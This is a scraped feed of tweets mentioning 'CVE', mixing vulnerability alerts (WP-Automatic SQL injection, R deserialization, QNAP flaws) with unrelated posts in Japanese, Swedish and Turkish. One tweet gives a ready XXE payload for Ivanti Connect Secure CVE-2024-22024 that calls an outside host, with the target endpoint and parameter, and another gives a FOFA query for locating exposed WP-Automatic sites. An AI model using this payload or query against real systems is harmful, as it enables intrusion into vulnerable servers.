Julien | MrTuxracer 🇪🇺(@MrTuxracer) 's Twitter Profile Photo

Today, I took a few minutes to analyze the Automatic Plugin CVE-2024-27956 (Unauthenticated Arbitrary SQL Execution) . Turns out it is super easy to exploit.

Here is a basic PoC:
Since 'q' is passed directly into a $wpdb->get_results() call,…

Today, I took a few minutes to analyze the #WordPress Automatic Plugin CVE-2024-27956 (Unauthenticated Arbitrary SQL Execution) #security #vulnerability. Turns out it is super easy to exploit.

Here is a basic PoC:
Since 'q' is passed directly into a $wpdb->get_results() call,…
account_circle
春宮みく Caress Van End新メンバー(@miku_cve) 's Twitter Profile Photo

本日チェルシーホテルにてライブありがとうございました!!!
汗だらだらだった、、たのしかった✊🏻
4月ラスト会いに来てくれて嬉しかったー!

本日チェルシーホテルにてライブありがとうございました!!!
汗だらだらだった、、たのしかった✊🏻
4月ラスト会いに来てくれて嬉しかったー!

#カレバン
account_circle
FofaBot(@fofabot) 's Twitter Profile Photo

⚠️⚠️ PoC for CVE-2024-27956(CVSS 9.9) Unauthenticated Arbitrary SQL Execution🔥

🎯4.6k+ Results are found on the en.fofa.info nearly year.

FOFA Link🔗:en.fofa.info/result?qbase64…

FOFA Query: body='wp-content/plugins/wp-automatic'

account_circle
The Hacker News(@TheHackersNews) 's Twitter Profile Photo

👨‍💻🔐 A new security (CVE-2024-27322) has been discovered in the R language. It could allow attackers to execute arbitrary code through malicious RDS files, exposing your projects to supply chain attacks.

Read: thehackernews.com/2024/04/new-r-…

account_circle
The Hacker News(@TheHackersNews) 's Twitter Profile Photo

🚨 Attention users!

A critical SQL injection (CVE-2024-27956) in the WP-Automatic plugin is being actively exploited. With a max severity of 9.9/10, this bug enables site takeovers and malicious activities.

Details: thehackernews.com/2024/04/hacker…

account_circle
Coffin(@coffinxp7) 's Twitter Profile Photo

Jenkins CVE-2024-23897 RCE
Nuclei default templates dont gives any result so i just modified the templates with latest one..

Jenkins CVE-2024-23897 RCE
Nuclei default templates dont gives any result so i just modified the templates with latest one..
account_circle
Andy Nguyen(@theflow0) 's Twitter Profile Photo

The PS4 (up to FW 11.00) and PS5 (up to FW 8.20) were vulnerable to CVE-2006-4304: hackerone.com/reports/2177925. I'll share details about successful exploitation at TyphoonCon.

account_circle
Magnus Ranstorp(@MagnusRanstorp) 's Twitter Profile Photo

Stöd utnyttjas av kriminella: ”För många blåser systemet”

Bra och viktigt att särskild stödfunktion inrättas på ⁦CVE_se⁩ för att hjälpa kommuner & myndigheter.

Jag har varit en stark blåslampa för att sätta problem på kartan under många, många år tv4play.se/klipp/15e61e81…

account_circle
HackManac(@H4ckManac) 's Twitter Profile Photo

🚨 Alert🚨

Three Critical QNAP Vulnerabilities Detected.
Hackers Can Hijack Your NAS, Update Immediately.

🔴CVE-2024-32766 (CVSS 10.0);
🔴CVE-2024-27124 (CVSS 7.5);
🔴CVE-2024-32764 (CVSS 9.9).

CVE-2024-27124 (CVSS 7.5) and CVE-2024-32766 (CVSS 10) - These…

🚨#Vulnerability Alert🚨 

Three Critical QNAP Vulnerabilities Detected.
Hackers Can Hijack Your NAS, Update Immediately.

🔴CVE-2024-32766 (CVSS 10.0);
🔴CVE-2024-27124 (CVSS 7.5);
🔴CVE-2024-32764 (CVSS 9.9).

CVE-2024-27124 (CVSS 7.5) and CVE-2024-32766 (CVSS 10) - These…
account_circle
-L Lawliet 🪩(@LRvexia) 's Twitter Profile Photo

4/ '' Lock CVE ''

Bu görevde ise CVE kilitlemenizi istiyor. Önerim düşük bir miktar girmeniz

- Unlock CVE görevinde ise kilitlediğiniz geri çekiyorsunuz. '' Manage '' yazısına tıklayıp çıkan kırmızı yazıda ki '' Release'' basıp cüzdan onayı alıp görevi tamamlıyorsunuz.

4/ '' Lock CVE ''

Bu görevde ise CVE kilitlemenizi istiyor. Önerim düşük bir miktar girmeniz

- Unlock CVE görevinde ise kilitlediğiniz geri çekiyorsunuz. '' Manage '' yazısına tıklayıp çıkan kırmızı yazıda ki '' Release''  basıp cüzdan onayı alıp görevi tamamlıyorsunuz.
account_circle
Will Gates(@WllGates) 's Twitter Profile Photo

CVE-2024-22024, XXE on Ivanti Connect Secure

payload encoded base64:

<?xml version='1.0' ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM 'http://{{external-host}}/x'> %xxe;]><r></r>

send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm

credit: H4x0r.DZ🇩🇿

CVE-2024-22024,  XXE on Ivanti Connect Secure

payload encoded base64:

<?xml version='1.0' ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM 'http://{{external-host}}/x'> %xxe;]><r></r>

send it to  127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm

credit: @h4x0r_dz 

#BugBounty
account_circle